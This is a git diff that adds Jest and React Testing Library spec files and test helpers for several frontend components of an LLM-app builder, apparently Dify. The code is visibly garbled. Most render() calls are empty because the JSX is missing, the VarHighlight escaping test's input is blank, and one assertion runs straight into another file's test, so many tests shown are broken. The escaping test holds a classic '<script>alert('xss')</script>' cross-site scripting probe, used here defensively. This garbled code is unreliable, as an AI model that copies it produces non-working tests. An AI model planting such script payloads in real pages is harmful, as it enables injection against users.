+ }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain(' & Special "Chars"', + }, + } + render() + + expect(screen.getByText('App & Special "Chars"')).toBeInTheDocument() + }) + + it('should handle onCreate function throwing error', async () => { + const errorOnCreate = jest.fn(() => { + throw new Error('Create failed') + }) + + // Mock console.error to avoid test output noise + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + let capturedError: unknown + try { + await userEvent.click(button) + } + catch (err) { + capturedError = err + } + expect(errorOnCreate).toHaveBeenCalledTimes(1) + expect(consoleSpy).toHaveBeenCalled() + if (capturedError instanceof Error) + expect(capturedError.message).toContain('Create failed') + + consoleSpy.mockRestore() + }) + }) + + describe('Accessibility', () => { + it('should have proper elements for accessibility', () => { + const { container } = render() + + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + it('should have title attribute for app name when truncated', () => { + render() + + const nameElement = screen.getByText('Test Chat App') + expect(nameElement).toHaveAttribute('title', 'Test Chat App') + }) + + it('should have accessible button with proper label', () => { + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + expect(button).toBeEnabled() + expect(button).toHaveTextContent('app.newApp.useTemplate') + }) + }) + + describe('User-Visible Behavior Tests', () => { + it('should show plus icon in create button', () => { + render() + + expect(screen.getByTestId('plus-icon')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-dialog/app-card/index.tsx b/web/app/components/app/create-app-dialog/app-card/index.tsx index 7f7ede0065..a3bf91cb5d 100644 --- a/web/app/components/app/create-app-dialog/app-card/index.tsx +++ b/web/app/components/app/create-app-dialog/app-card/index.tsx @@ -15,6 +15,7 @@ export type AppCardProps = { const AppCard = ({ app, + canCreate, onCreate, }: AppCardProps) => { const { t } = useTranslation() @@ -45,14 +46,16 @@ const AppCard = ({ {app.description}
- ) } diff --git a/web/app/components/app/create-app-dialog/index.spec.tsx b/web/app/components/app/create-app-dialog/index.spec.tsx new file mode 100644 index 0000000000..a64e409b25 --- /dev/null +++ b/web/app/components/app/create-app-dialog/index.spec.tsx @@ -0,0 +1,287 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import CreateAppTemplateDialog from './index' + +// Mock external dependencies (not base components) +jest.mock('./app-list', () => { + return function MockAppList({ + onCreateFromBlank, + onSuccess, + }: { + onCreateFromBlank?: () => void + onSuccess: () => void + }) { + return ( +
+ + {onCreateFromBlank && ( + + )} +
+ ) + } +}) + +jest.mock('ahooks', () => ({ + useKeyPress: jest.fn((key: string, callback: () => void) => { + // Mock implementation for testing + return jest.fn() + }), +})) + +describe('CreateAppTemplateDialog', () => { + const defaultProps = { + show: false, + onSuccess: jest.fn(), + onClose: jest.fn(), + onCreateFromBlank: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should not render when show is false', () => { + render() + + // FullScreenModal should not render any content when open is false + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + + it('should render modal when show is true', () => { + render() + + // FullScreenModal renders with role="dialog" + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + + it('should render create from blank button when onCreateFromBlank is provided', () => { + render() + + expect(screen.getByTestId('create-from-blank')).toBeInTheDocument() + }) + + it('should not render create from blank button when onCreateFromBlank is not provided', () => { + const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + render() + + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should pass show prop to FullScreenModal', () => { + const { rerender } = render() + + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + + rerender() + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should pass closable prop to FullScreenModal', () => { + // Since the FullScreenModal is always rendered with closable=true + // we can verify that the modal renders with the proper structure + render() + + // Verify that the modal has the proper dialog structure + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(dialog).toHaveAttribute('aria-modal', 'true') + }) + }) + + describe('User Interactions', () => { + it('should handle close interactions', () => { + const mockOnClose = jest.fn() + render() + + // Test that the modal is rendered + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + + // Test that AppList component renders (child component interactions) + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.getByTestId('app-list-success')).toBeInTheDocument() + }) + + it('should call both onSuccess and onClose when app list success is triggered', () => { + const mockOnSuccess = jest.fn() + const mockOnClose = jest.fn() + render() + + fireEvent.click(screen.getByTestId('app-list-success')) + + expect(mockOnSuccess).toHaveBeenCalledTimes(1) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onCreateFromBlank when create from blank is clicked', () => { + const mockOnCreateFromBlank = jest.fn() + render() + + fireEvent.click(screen.getByTestId('create-from-blank')) + + expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1) + }) + }) + + describe('useKeyPress Integration', () => { + it('should set up ESC key listener when modal is shown', () => { + const { useKeyPress } = require('ahooks') + + render() + + expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function)) + }) + + it('should handle ESC key press to close modal', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + expect(capturedCallback).toBeDefined() + expect(typeof capturedCallback).toBe('function') + + // Simulate ESC key press + capturedCallback?.() + + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when ESC key is pressed and modal is not shown', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + // The callback should still be created but not execute onClose + expect(capturedCallback).toBeDefined() + + // Simulate ESC key press + capturedCallback?.() + + // onClose should not be called because modal is not shown + expect(mockOnClose).not.toHaveBeenCalled() + }) + }) + + describe('Callback Dependencies', () => { + it('should create stable callback reference for ESC key handler', () => { + const { useKeyPress } = require('ahooks') + + render() + + // Verify that useKeyPress was called with a function + const calls = useKeyPress.mock.calls + expect(calls.length).toBeGreaterThan(0) + expect(calls[0][0]).toBe('esc') + expect(typeof calls[0][1]).toBe('function') + }) + }) + + describe('Edge Cases', () => { + it('should handle null props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle undefined props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle rapid show/hide toggles', () => { + // Test initial state + const { unmount } = render() + unmount() + + // Test show state + render() + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Test hide state + render() + // Due to transition animations, we just verify the component handles the prop change + expect(() => render()).not.toThrow() + }) + + it('should handle missing optional onCreateFromBlank prop', () => { + const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + + it('should work with all required props only', () => { + const requiredProps = { + show: true, + onSuccess: jest.fn(), + onClose: jest.fn(), + } + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx new file mode 100644 index 0000000000..1b1e729546 --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -0,0 +1,209 @@ +import type { RenderOptions } from '@testing-library/react' +import { fireEvent, render } from '@testing-library/react' +import { defaultPlan } from '@/app/components/billing/config' +import { noop } from 'lodash-es' +import type { ModalContextState } from '@/context/modal-context' +import APIKeyInfoPanel from './index' + +// Mock the modules before importing the functions +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: jest.fn(), +})) + +import { useProviderContext as actualUseProviderContext } from '@/context/provider-context' +import { useModalContext as actualUseModalContext } from '@/context/modal-context' + +// Type casting for mocks +const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction +const mockUseModalContext = actualUseModalContext as jest.MockedFunction + +// Default mock data +const defaultProviderContext = { + modelProviders: [], + refreshModelProviders: noop, + textGenerationModelList: [], + supportRetrievalMethods: [], + isAPIKeySet: false, + plan: defaultPlan, + isFetchedPlan: false, + enableBilling: false, + onPlanInfoChanged: noop, + enableReplaceWebAppLogo: false, + modelLoadBalancingEnabled: false, + datasetOperatorEnabled: false, + enableEducationPlan: false, + isEducationWorkspace: false, + isEducationAccount: false, + allowRefreshEducationVerify: false, + educationAccountExpireAt: null, + isLoadingEducationAccountInfo: false, + isFetchingEducationAccountInfo: false, + webappCopyrightEnabled: false, + licenseLimit: { + workspace_members: { + size: 0, + limit: 0, + }, + }, + refreshLicenseLimit: noop, + isAllowTransferWorkspace: false, + isAllowPublishAsCustomKnowledgePipelineTemplate: false, +} + +const defaultModalContext: ModalContextState = { + setShowAccountSettingModal: noop, + setShowApiBasedExtensionModal: noop, + setShowModerationSettingModal: noop, + setShowExternalDataToolModal: noop, + setShowPricingModal: noop, + setShowAnnotationFullModal: noop, + setShowModelModal: noop, + setShowExternalKnowledgeAPIModal: noop, + setShowModelLoadBalancingModal: noop, + setShowOpeningModal: noop, + setShowUpdatePluginModal: noop, + setShowEducationExpireNoticeModal: noop, + setShowTriggerEventsLimitModal: noop, +} + +export type MockOverrides = { + providerContext?: Partial + modalContext?: Partial +} + +export type APIKeyInfoPanelRenderOptions = { + mockOverrides?: MockOverrides +} & Omit + +// Setup function to configure mocks +export function setupMocks(overrides: MockOverrides = {}) { + mockUseProviderContext.mockReturnValue({ + ...defaultProviderContext, + ...overrides.providerContext, + }) + + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + ...overrides.modalContext, + }) +} + +// Custom render function +export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) { + const { mockOverrides, ...renderOptions } = options + + setupMocks(mockOverrides) + + return render(, renderOptions) +} + +// Helper functions for common test scenarios +export const scenarios = { + // Render with API key not set (default) + withAPIKeyNotSet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: false }, + ...overrides, + }, + }), + + // Render with API key already set + withAPIKeySet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: true }, + ...overrides, + }, + }), + + // Render with mock modal function + withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal }, + ...overrides, + }, + }), +} + +// Common test assertions +export const assertions = { + // Should render main button + shouldRenderMainButton: () => { + const button = document.querySelector('button.btn-primary') + expect(button).toBeInTheDocument() + return button + }, + + // Should not render at all + shouldNotRender: (container: HTMLElement) => { + expect(container.firstChild).toBeNull() + }, + + // Should have correct panel styling + shouldHavePanelStyling: (panel: HTMLElement) => { + expect(panel).toHaveClass( + 'border-components-panel-border', + 'bg-components-panel-bg', + 'relative', + 'mb-6', + 'rounded-2xl', + 'border', + 'p-8', + 'shadow-md', + ) + }, + + // Should have close button + shouldHaveCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + expect(closeButton).toBeInTheDocument() + expect(closeButton).toHaveClass('cursor-pointer') + return closeButton + }, +} + +// Common user interactions +export const interactions = { + // Click the main button + clickMainButton: () => { + const button = document.querySelector('button.btn-primary') + if (button) fireEvent.click(button) + return button + }, + + // Click the close button + clickCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + if (closeButton) fireEvent.click(closeButton) + return closeButton + }, +} + +// Text content keys for assertions +export const textKeys = { + selfHost: { + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, + }, + cloud: { + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, + trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + }, +} + +// Setup and cleanup utilities +export function clearAllMocks() { + jest.clearAllMocks() +} + +// Export mock functions for external access +export { mockUseProviderContext, mockUseModalContext, defaultModalContext } diff --git a/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx new file mode 100644 index 0000000000..c7cb061fde --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx @@ -0,0 +1,122 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for Cloud edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: false, // Test Cloud edition +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Cloud Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Cloud Edition Content', () => { + it('should display cloud version title', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument() + }) + + it('should display emoji for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀') + }) + + it('should display cloud version description', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument() + }) + + it('should not render external link for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument() + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.spec.tsx b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx new file mode 100644 index 0000000000..62eeb4299e --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx @@ -0,0 +1,162 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for CE edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: true, // Test CE edition by default +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Community Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Content Display', () => { + it('should display self-host title content', () => { + scenarios.withAPIKeyNotSet() + + expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument() + expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument() + }) + + it('should render external link with correct href for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toBeInTheDocument() + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveTextContent(textKeys.selfHost.tryCloud) + }) + + it('should have external link with proper styling for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toHaveClass( + 'mt-2', + 'flex', + 'h-[26px]', + 'items-center', + 'space-x-1', + 'p-1', + 'text-xs', + 'font-medium', + 'text-[#155EEF]', + ) + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('State Management', () => { + it('should start with visible panel (isShow: true)', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should toggle visibility when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Edge Cases', () => { + it('should handle provider context loading state', () => { + scenarios.withAPIKeyNotSet({ + providerContext: { + modelProviders: [], + textGenerationModelList: [], + }, + }) + assertions.shouldRenderMainButton() + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal 